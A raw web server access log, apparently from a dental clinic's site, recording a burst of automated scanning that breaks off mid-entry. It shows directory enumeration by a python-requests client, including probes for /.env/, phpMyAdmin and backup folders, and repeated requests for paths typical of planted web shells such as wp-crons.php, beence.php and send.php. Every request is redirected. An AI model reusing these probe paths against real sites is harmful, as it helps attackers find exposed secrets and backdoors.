[12/Aug/2025:08:59:13 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 4.43.184.113 - - [12/Aug/2025:08:59:22 -0400] "GET / HTTP/1.1" 301 231 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36" 69.171.249.6 - - [12/Aug/2025:09:00:31 -0400] "GET /teeth-implant HTTP/1.1" 301 244 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)" 173.252.95.31 - - [12/Aug/2025:09:02:50 -0400] "GET /teeth-implant HTTP/1.1" 301 244 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)" 52.23.225.234 - - [12/Aug/2025:09:06:58 -0400] "GET /wp-admin/css/colors/blue/wp-crons.wp-admin/css/colors/blue/wp-crons.php HTTP/1.1" 301 302 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 86.8.204.43 - - [12/Aug/2025:09:11:27 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 68.183.245.101 - - [12/Aug/2025:09:11:27 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:09:11:27 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [12/Aug/2025:09:11:28 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 52.23.225.234 - - [12/Aug/2025:09:13:12 -0400] "GET /moduless.php HTTP/1.1" 301 243 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 149.102.237.41 - - [12/Aug/2025:09:13:24 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 209.38.125.40 - - [12/Aug/2025:09:13:24 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 156.146.41.214 - - [12/Aug/2025:09:13:24 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.22.91.139 - - [12/Aug/2025:09:13:25 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 52.23.225.234 - - [12/Aug/2025:09:14:54 -0400] "GET /WP/ HTTP/1.1" 301 234 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:14:55 -0400] "GET /bc/ HTTP/1.1" 301 234 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:14:56 -0400] "GET /bk/ HTTP/1.1" 301 234 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:14:58 -0400] "GET /db/ HTTP/1.1" 301 234 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:14:59 -0400] "GET /js/ HTTP/1.1" 301 234 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:15:00 -0400] "GET /js/ HTTP/1.1" 301 234 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:15:01 -0400] "GET /mt/ HTTP/1.1" 301 234 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:15:02 -0400] "GET /up/ HTTP/1.1" 301 234 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:15:03 -0400] "GET /wp/ HTTP/1.1" 301 234 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:15:04 -0400] "GET /NEW/ HTTP/1.1" 301 235 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:15:05 -0400] "GET /OLD/ HTTP/1.1" 301 235 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:15:06 -0400] "GET /Tmp/ HTTP/1.1" 301 235 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:15:07 -0400] "GET /bac/ HTTP/1.1" 301 235 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:15:08 -0400] "GET /bak/ HTTP/1.1" 301 235 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:15:10 -0400] "GET /cms/ HTTP/1.1" 301 235 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:15:11 -0400] "GET /css/ HTTP/1.1" 301 235 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:15:12 -0400] "GET /dev/ HTTP/1.1" 301 235 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:15:13 -0400] "GET /img/ HTTP/1.1" 301 235 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:15:14 -0400] "GET /new/ HTTP/1.1" 301 235 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:15:15 -0400] "GET /new/ HTTP/1.1" 301 235 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:15:16 -0400] "GET /new/d/ HTTP/1.1" 301 237 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:15:17 -0400] "GET /new/n/ HTTP/1.1" 301 237 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:15:18 -0400] "GET /new/teeth-aligners/ HTTP/1.1" 301 250 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:15:21 -0400] "GET /new/teeth-implant/ HTTP/1.1" 301 249 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:15:24 -0400] "GET /old/ HTTP/1.1" 301 235 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:15:36 -0400] "GET /pdf/ HTTP/1.1" 301 235 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:15:38 -0400] "GET /php/ HTTP/1.1" 301 235 "-" "python-requests/2.31.0" 152.42.157.60 - - [12/Aug/2025:09:15:38 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 159.89.216.7 - - [12/Aug/2025:09:15:38 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 174.138.112.39 - - [12/Aug/2025:09:15:38 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 170.64.252.169 - - [12/Aug/2025:09:15:38 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 52.23.225.234 - - [12/Aug/2025:09:15:39 -0400] "GET /pma/ HTTP/1.1" 301 235 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:15:40 -0400] "GET /rss/ HTTP/1.1" 301 235 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:15:41 -0400] "GET /sql/ HTTP/1.1" 301 235 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:15:42 -0400] "GET /tmb/ HTTP/1.1" 301 235 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:15:43 -0400] "GET /tmp/ HTTP/1.1" 301 235 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:15:44 -0400] "GET /web/ HTTP/1.1" 301 235 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:15:45 -0400] "GET /www/ HTTP/1.1" 301 235 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:15:46 -0400] "GET /.env/ HTTP/1.1" 301 236 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:15:47 -0400] "GET /.tmb/ HTTP/1.1" 301 236 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:15:49 -0400] "GET /2018/ HTTP/1.1" 301 236 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:15:50 -0400] "GET /2019/ HTTP/1.1" 301 236 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:15:51 -0400] "GET /2020/ HTTP/1.1" 301 236 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:15:52 -0400] "GET /2021/ HTTP/1.1" 301 236 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:15:53 -0400] "GET /2022/ HTTP/1.1" 301 236 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:15:54 -0400] "GET /BLOG/ HTTP/1.1" 301 236 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:15:55 -0400] "GET /SHOP/ HTTP/1.1" 301 236 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:15:56 -0400] "GET /Site/ HTTP/1.1" 301 236 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:15:57 -0400] "GET /TEST/ HTTP/1.1" 301 236 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:15:58 -0400] "GET /back/ HTTP/1.1" 301 236 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:15:59 -0400] "GET /blog/ HTTP/1.1" 301 236 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:16:00 -0400] "GET /demo/ HTTP/1.1" 301 236 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:16:01 -0400] "GET /docs/ HTTP/1.1" 301 236 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:16:02 -0400] "GET /feed/ HTTP/1.1" 301 236 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:16:03 -0400] "GET /file/ HTTP/1.1" 301 236 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:16:04 -0400] "GET /home/ HTTP/1.1" 301 236 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:16:05 -0400] "GET /main/ HTTP/1.1" 301 236 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:16:06 -0400] "GET /shop/ HTTP/1.1" 301 236 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:16:07 -0400] "GET /site/ HTTP/1.1" 301 236 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:16:08 -0400] "GET /sito/ HTTP/1.1" 301 236 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:16:10 -0400] "GET /test/ HTTP/1.1" 301 236 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:16:11 -0400] "GET /tinc/ HTTP/1.1" 301 236 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:16:12 -0400] "GET /tmps/ HTTP/1.1" 301 236 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:16:13 -0400] "GET /user/ HTTP/1.1" 301 236 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:16:14 -0400] "GET /admin/ HTTP/1.1" 301 237 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:16:15 -0400] "GET /files/ HTTP/1.1" 301 237 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:16:16 -0400] "GET /fonts/ HTTP/1.1" 301 237 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:16:17 -0400] "GET /forum/ HTTP/1.1" 301 237 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:16:18 -0400] "GET /image/ HTTP/1.1" 301 237 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:16:19 -0400] "GET /mysql/ HTTP/1.1" 301 237 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:16:20 -0400] "GET /sitio/ HTTP/1.1" 301 237 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:16:21 -0400] "GET /97bwag/ HTTP/1.1" 301 238 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:16:22 -0400] "GET /assets/ HTTP/1.1" 301 238 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:16:23 -0400] "GET /assets/ HTTP/1.1" 301 238 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:16:24 -0400] "GET /assets/counter/ HTTP/1.1" 301 246 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:16:25 -0400] "GET /assets/counter//assets/ HTTP/1.1" 301 253 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:16:26 -0400] "GET /assets/counter/css/ HTTP/1.1" 301 250 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:16:27 -0400] "GET /assets/counter/css//assets/counter/ HTTP/1.1" 301 265 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:16:29 -0400] "GET /assets/counter/img/ HTTP/1.1" 301 250 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:16:30 -0400] "GET /assets/counter/img//assets/counter/ HTTP/1.1" 301 265 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:16:31 -0400] "GET /assets/counter/js/ HTTP/1.1" 301 249 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:16:32 -0400] "GET /assets/counter/js//assets/counter/ HTTP/1.1" 301 264 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:16:34 -0400] "GET /assets/counter/plugins/ HTTP/1.1" 301 254 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:16:35 -0400] "GET /assets/counter/plugins//assets/counter/ HTTP/1.1" 301 269 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:16:36 -0400] "GET /assets/counter/plugins/bootstrap/ HTTP/1.1" 301 264 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:16:37 -0400] "GET /assets/counter/plugins/bootstrap//assets/counter/plugins/ HTTP/1.1" 301 287 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:16:38 -0400] "GET /assets/counter/plugins/countdown/ HTTP/1.1" 301 264 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:16:39 -0400] "GET /assets/counter/plugins/countdown//assets/counter/plugins/ HTTP/1.1" 301 287 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:16:40 -0400] "GET /assets/counter/plugins/font-awesome/ HTTP/1.1" 301 267 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:16:41 -0400] "GET /assets/counter/plugins/font-awesome//assets/counter/plugins/ HTTP/1.1" 301 290 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:16:42 -0400] "GET /assets/counter/plugins/jquery/ HTTP/1.1" 301 261 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:16:43 -0400] "GET /assets/counter/plugins/jquery//assets/counter/plugins/ HTTP/1.1" 301 284 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:16:44 -0400] "GET /assets/counter/plugins/parallax/ HTTP/1.1" 301 263 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:16:45 -0400] "GET /assets/counter/plugins/parallax//assets/counter/plugins/ HTTP/1.1" 301 286 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:16:46 -0400] "GET /assets/css/ HTTP/1.1" 301 242 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:16:47 -0400] "GET /assets/css//assets/ HTTP/1.1" 301 249 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:16:48 -0400] "GET /assets/css/dark.php HTTP/1.1" 301 250 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:16:50 -0400] "GET /assets/css/images/ HTTP/1.1" 301 249 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:16:51 -0400] "GET /assets/css/images//assets/css/ HTTP/1.1" 301 260 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:16:52 -0400] "GET /assets/fonts/ HTTP/1.1" 301 244 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:16:53 -0400] "GET /assets/fonts//assets/ HTTP/1.1" 301 251 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:16:54 -0400] "GET /assets/images/ HTTP/1.1" 301 245 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:16:56 -0400] "GET /assets/images//assets/ HTTP/1.1" 301 252 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:16:57 -0400] "GET /assets/images/about/ HTTP/1.1" 301 251 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:16:58 -0400] "GET /assets/images/about//assets/images/ HTTP/1.1" 301 265 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:16:59 -0400] "GET /assets/images/awards/ HTTP/1.1" 301 252 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:17:00 -0400] "GET /assets/images/awards//assets/images/ HTTP/1.1" 301 266 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:17:01 -0400] "GET /assets/images/backgrounds/ HTTP/1.1" 301 257 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:17:02 -0400] "GET /assets/images/banners/ HTTP/1.1" 301 253 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:17:03 -0400] "GET /assets/images/banners//assets/images/ HTTP/1.1" 301 267 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:17:04 -0400] "GET /assets/images/blog/ HTTP/1.1" 301 250 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:17:05 -0400] "GET /assets/images/blog//assets/images/ HTTP/1.1" 301 264 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:17:06 -0400] "GET /assets/images/blog/author/ HTTP/1.1" 301 257 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:17:07 -0400] "GET /assets/images/blog/author//assets/images/blog/ HTTP/1.1" 301 276 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:17:08 -0400] "GET /assets/images/blog/grid/ HTTP/1.1" 301 255 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:17:09 -0400] "GET /assets/images/blog/grid//assets/images/blog/ HTTP/1.1" 301 274 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:17:10 -0400] "GET /assets/images/blog/single/ HTTP/1.1" 301 257 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:17:11 -0400] "GET /assets/images/blog/single//assets/images/blog/ HTTP/1.1" 301 276 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:17:12 -0400] "GET /assets/images/clients/ HTTP/1.1" 301 253 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:17:13 -0400] "GET /assets/images/clients//assets/images/ HTTP/1.1" 301 267 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:17:14 -0400] "GET /backup/ HTTP/1.1" 301 238 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:17:16 -0400] "GET /blocks/ HTTP/1.1" 301 238 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:17:17 -0400] "GET /config/ HTTP/1.1" 301 238 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:17:18 -0400] "GET /cpanel/ HTTP/1.1" 301 238 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:17:19 -0400] "GET /forums/ HTTP/1.1" 301 238 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:17:20 -0400] "GET /images/ HTTP/1.1" 301 238 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:17:21 -0400] "GET /portal/ HTTP/1.1" 301 238 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:17:22 -0400] "GET /status/ HTTP/1.1" 301 238 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:17:23 -0400] "GET /upload/ HTTP/1.1" 301 238 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:17:24 -0400] "GET /wp-old/ HTTP/1.1" 301 238 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:17:25 -0400] "GET /.wp-cli/ HTTP/1.1" 301 239 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:17:26 -0400] "GET /cgialfa/ HTTP/1.1" 301 239 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:17:27 -0400] "GET /gallery/ HTTP/1.1" 301 239 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:17:28 -0400] "GET /graphql/ HTTP/1.1" 301 239 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:17:30 -0400] "GET /include/ HTTP/1.1" 301 239 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:17:30 -0400] "GET /modules/ HTTP/1.1" 301 239 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:17:32 -0400] "GET /myadmin/ HTTP/1.1" 301 239 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:17:33 -0400] "GET /network/ HTTP/1.1" 301 239 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:17:34 -0400] "GET /old/rss/ HTTP/1.1" 301 239 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:17:35 -0400] "GET /oldsite/ HTTP/1.1" 301 239 "-" "python-requests/2.31.0" 52.23.225.234 - - [12/Aug/2025:09:18:53 -0400] "GET /beence.php HTTP/1.1" 301 241 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 146.190.11.185 - - [12/Aug/2025:09:19:03 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:09:19:03 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 164.90.241.135 - - [12/Aug/2025:09:19:03 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 159.203.144.167 - - [12/Aug/2025:09:19:03 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 52.23.225.234 - - [12/Aug/2025:09:24:17 -0400] "GET /wp-admin/css/colors/coffee/index.php HTTP/1.1" 301 267 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 103.206.201.39 - - [12/Aug/2025:09:25:28 -0400] "GET /assets/css/dark.php HTTP/1.1" 301 250 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36" 68.183.245.101 - - [12/Aug/2025:09:27:10 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:09:27:10 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 86.8.204.43 - - [12/Aug/2025:09:27:10 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [12/Aug/2025:09:27:10 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.102.237.41 - - [12/Aug/2025:09:27:27 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 209.38.125.40 - - [12/Aug/2025:09:27:27 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 156.146.41.214 - - [12/Aug/2025:09:27:27 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.22.91.139 - - [12/Aug/2025:09:27:30 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 209.38.125.40 - - [12/Aug/2025:09:27:30 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 144.126.240.247 - - [12/Aug/2025:09:27:30 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 146.190.203.144 - - [12/Aug/2025:09:27:30 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 146.190.190.67 - - [12/Aug/2025:09:27:31 -0400] "GET 